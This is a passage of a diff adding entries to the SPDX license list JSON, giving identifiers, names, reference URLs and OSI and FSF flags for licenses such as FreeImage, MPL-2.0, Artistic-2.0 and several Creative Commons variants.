+ "name": "FreeImage Public License v1.0",
+ "licenseId": "FreeImage",
+ "seeAlso": [
+ "http://freeimage.sourceforge.net/freeimage-license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.51.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.51.json",
+ "referenceNumber": 107,
+ "name": "Solderpad Hardware License, Version 0.51",
+ "licenseId": "SHL-0.51",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.51/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Jython.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Jython.json",
+ "referenceNumber": 108,
+ "name": "CNRI Jython License",
+ "licenseId": "CNRI-Jython",
+ "seeAlso": [
+ "http://www.jython.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-1.1.json",
+ "referenceNumber": 109,
+ "name": "Zope Public License 1.1",
+ "licenseId": "ZPL-1.1",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Afmparse.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Afmparse.json",
+ "referenceNumber": 110,
+ "name": "Afmparse License",
+ "licenseId": "Afmparse",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Afmparse"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.1.json",
+ "referenceNumber": 111,
+ "name": "Open LDAP Public License v2.1",
+ "licenseId": "OLDAP-2.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db0d176738e96a0d3b9f85cb51e140a86f21be715"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Rdisc.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Rdisc.json",
+ "referenceNumber": 112,
+ "name": "Rdisc License",
+ "licenseId": "Rdisc",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Rdisc_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Imlib2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Imlib2.json",
+ "referenceNumber": 113,
+ "name": "Imlib2 License",
+ "licenseId": "Imlib2",
+ "seeAlso": [
+ "http://trac.enlightenment.org/e/browser/trunk/imlib2/COPYING",
+ "https://git.enlightenment.org/legacy/imlib2.git/tree/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-Shortened.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-Shortened.json",
+ "referenceNumber": 114,
+ "name": "BSD 4 Clause Shortened",
+ "licenseId": "BSD-4-Clause-Shortened",
+ "seeAlso": [
+ "https://metadata.ftp-master.debian.org/changelogs//main/a/arpwatch/arpwatch_2.1a15-7_copyright"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail.json",
+ "referenceNumber": 115,
+ "name": "Sendmail License",
+ "licenseId": "Sendmail",
+ "seeAlso": [
+ "http://www.sendmail.com/pdfs/open_source/sendmail_license.pdf",
+ "https://web.archive.org/web/20160322142305/https://www.sendmail.com/pdfs/open_source/sendmail_license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5.json",
+ "referenceNumber": 116,
+ "name": "Creative Commons Attribution 2.5 Generic",
+ "licenseId": "CC-BY-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AAL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AAL.json",
+ "referenceNumber": 117,
+ "name": "Attribution Assurance License",
+ "licenseId": "AAL",
+ "seeAlso": [
+ "https://opensource.org/licenses/attribution"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0-no-copyleft-exception.json",
+ "referenceNumber": 118,
+ "name": "Mozilla Public License 2.0 (no copyleft exception)",
+ "licenseId": "MPL-2.0-no-copyleft-exception",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.5.json",
+ "referenceNumber": 119,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.5 Generic",
+ "licenseId": "CC-BY-NC-ND-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-NL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-NL.json",
+ "referenceNumber": 120,
+ "name": "Creative Commons Attribution 3.0 Netherlands",
+ "licenseId": "CC-BY-3.0-NL",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/nl/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.02.json",
+ "referenceNumber": 121,
+ "name": "Lucent Public License v1.02",
+ "licenseId": "LPL-1.02",
+ "seeAlso": [
+ "http://plan9.bell-labs.com/plan9/license.html",
+ "https://opensource.org/licenses/LPL-1.02"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ECL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
+ "referenceNumber": 122,
+ "name": "Educational Community License v1.0",
+ "licenseId": "ECL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
+ "referenceNumber": 123,
+ "name": "SIL Open Font License 1.0 with no Reserved Font Name",
+ "licenseId": "OFL-1.0-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
+ "referenceNumber": 124,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-NC-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
+ "referenceNumber": 125,
+ "name": "Creative Commons Attribution Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP.json",
+ "referenceNumber": 126,
+ "name": "NTP License",
+ "licenseId": "NTP",
+ "seeAlso": [
+ "https://opensource.org/licenses/NTP"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
+ "referenceNumber": 127,
+ "name": "Mozilla Public License 2.0",
+ "licenseId": "MPL-2.0",
+ "seeAlso": [
+ "https://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
+ "referenceNumber": 128,
+ "name": "Apple Public Source License 1.2",
+ "licenseId": "APSL-1.2",
+ "seeAlso": [
+ "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
+ "referenceNumber": 129,
+ "name": "GNU Free Documentation License v1.2 only - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
+ "referenceNumber": 130,
+ "name": "Artistic License 2.0",
+ "licenseId": "Artistic-2.0",
+ "seeAlso": [
+ "http://www.perlfoundation.org/artistic_license_2_0",
+ "https://www.perlfoundation.org/artistic-license-20.html",
+ "https://opensource.org/licenses/artistic-license-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
+ "referenceNumber": 131,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSCPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
+ "referenceNumber": 132,
+ "name": "Ricoh Source Code Public License",
+ "licenseId": "RSCPL",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
+ "https://opensource.org/licenses/RSCPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sleepycat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
+ "referenceNumber": 133,
+ "name": "Sleepycat License",
+ "licenseId": "Sleepycat",
+ "seeAlso": [
+ "https://opensource.org/licenses/Sleepycat"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xpp.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xpp.json",
+ "referenceNumber": 134,
+ "name": "XPP License",
+ "licenseId": "xpp",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/xpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
+ "referenceNumber": 135,
+ "name": "Community Data License Agreement Sharing 1.0",
+ "licenseId": "CDLA-Sharing-1.0",
+ "seeAlso": [
+ "https://cdla.io/sharing-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ClArtistic.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
+ "referenceNumber": 136,
+ "name": "Clarified Artistic License",
+ "licenseId": "ClArtistic",
+ "seeAlso": [
+ "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
+ "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
+ "referenceNumber": 137,
+ "name": "Affero General Public License v1.0 only",
+ "licenseId": "AGPL-1.0-only",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
+ "referenceNumber": 138,
+ "name": "Creative Commons Attribution 3.0 Germany",
+ "licenseId": "CC-BY-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
+ "referenceNumber": 139,
+ "name": "Academic Free License v2.0",
+ "licenseId": "AFL-2.0",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel.json",
+ "referenceNumber": 140,
+ "name": "Intel Open Source License",
+ "licenseId": "Intel",
+ "seeAlso": [
+ "https://opensource.org/licenses/Intel"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
+ "referenceNumber": 141,
+ "name": "GNU Free Documentation License v1.1 or later - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APAFML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APAFML.json",
+ "referenceNumber": 142,
+ "name": "Adobe Postscript AFM License",
+ "licenseId": "APAFML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
+ "referenceNumber": 143,
+ "name": "GNU Free Documentation License v1.2",
+ "licenseId": "GFDL-1.2",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL.json",
+ "referenceNumber": 144,
+ "name": "Sun Industry Standards Source License v1.1",
+ "licenseId": "SISSL",
+ "seeAlso": [
+ "http://www.openoffice.org/licenses/sissl_license.html",
+ "https://opensource.org/licenses/SISSL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Naumen.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Naumen.json",
+ "referenceNumber": 145,
+ "name": "Naumen Public License",
+ "licenseId": "Naumen",
+ "seeAlso": [
+ "https://opensource.org/licenses/Naumen"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HTMLTIDY.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
+ "referenceNumber": 146,
+ "name": "HTML Tidy License",
+ "licenseId": "HTMLTIDY",
+ "seeAlso": [
+ "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
+ "referenceNumber": 147,
+ "name": "Open LDAP Public License v2.8",
+ "licenseId": "OLDAP-2.8",
+ "seeAlso": [
+ "http://www.openldap.org/software/release/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/blessing.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/blessing.json",
+ "referenceNumber": 148,
+ "name": "SQLite Blessing",
+ "licenseId": "blessing",
+ "seeAlso": [
+ "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
+ "https://sqlite.org/src/artifact/df5091916dbb40e6"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
+ "referenceNumber": 149,
+ "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGTSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
+ "referenceNumber": 150,
+ "name": "Open Group Test Suite License",
+ "licenseId": "OGTSL",
+ "seeAlso": [
+ "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
+ "https://opensource.org/licenses/OGTSL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
+ "referenceNumber": 151,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
+ "referenceNumber": 152,
+ "name": "The Parity Public License 7.0.0",
+ "licenseId": "Parity-7.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/7.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
+ "referenceNumber": 153,
+ "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/dvipdfm.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
+ "referenceNumber": 154,
+ "name": "dvipdfm License",
+ "licenseId": "dvipdfm",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/dvipdfm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
+ "referenceNumber": 155,
+ "name": "CNRI Python License",
+ "licenseId": "CNRI-Python",
+ "seeAlso": [
+ "https://opensource.org/licenses/CNRI-Python"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
+ "referenceNumber": 156,
+ "name": "BSD-4-Clause (University of California-Specific)",
+ "licenseId": "BSD-4-Clause-UC",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
+ "referenceNumber": 157,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
+ "licenseId": "NLOD-1.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-RL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
+ "referenceNumber": 158,
+ "name": "Microsoft Reciprocal License",
+ "licenseId": "MS-RL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-RL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
+ "referenceNumber": 159,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
+ "licenseId": "CC-BY-NC-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HaskellReport.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
+ "referenceNumber": 160,
+ "name": "Haskell Language Report License",
+ "licenseId": "HaskellReport",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
+ "referenceNumber": 161,
+ "name": "Creative Commons Attribution 1.0 Generic",
+ "licenseId": "CC-BY-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UCL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
+ "referenceNumber": 162,
+ "name": "Upstream Compatibility License v1.0",
+ "licenseId": "UCL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UCL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Mup.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Mup.json",
+ "referenceNumber": 163,
+ "name": "Mup License",
+ "licenseId": "Mup",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Mup"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMPPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
+ "referenceNumber": 164,
+ "name": "Secure Messaging Protocol Public License",
+ "licenseId": "SMPPL",
+ "seeAlso": [
+ "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
+ "referenceNumber": 165,
+ "name": "PHP License v3.0",
+ "licenseId": "PHP-3.0",
+ "seeAlso": [
+ "http://www.php.net/license/3_0.txt",
+ "https://opensource.org/licenses/PHP-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GL2PS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
+ "referenceNumber": 166,
+ "name": "GL2PS License",
+ "licenseId": "GL2PS",
+ "seeAlso": [
+ "http://www.geuz.org/gl2ps/COPYING.GL2PS"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CrystalStacker.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
+ "referenceNumber": 167,
+ "name": "CrystalStacker License",
+ "licenseId": "CrystalStacker",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-20150513.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
+ "referenceNumber": 168,
+ "name": "W3C Software Notice and Document License (2015-05-13)",
+ "licenseId": "W3C-20150513",
+ "seeAlso": [
+ "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
+ "referenceNumber": 169,
+ "name": "NIST Public Domain Notice with license fallback",
+ "licenseId": "NIST-PD-fallback",
+ "seeAlso": [
+ "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
+ "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
+ "referenceNumber": 170,
+ "name": "Open Government Licence v1.0",
+ "licenseId": "OGL-UK-1.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
+ "referenceNumber": 171,
+ "name": "Common Public License 1.0",
+ "licenseId": "CPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
+ "referenceNumber": 172,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
+ "referenceNumber": 173,
+ "name": "Zope Public License 2.0",
+ "licenseId": "ZPL-2.0",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-2.0",
+ "https://opensource.org/licenses/ZPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
+ "referenceNumber": 174,
+ "name": "Frameworx Open License 1.0",
+ "licenseId": "Frameworx-1.0",
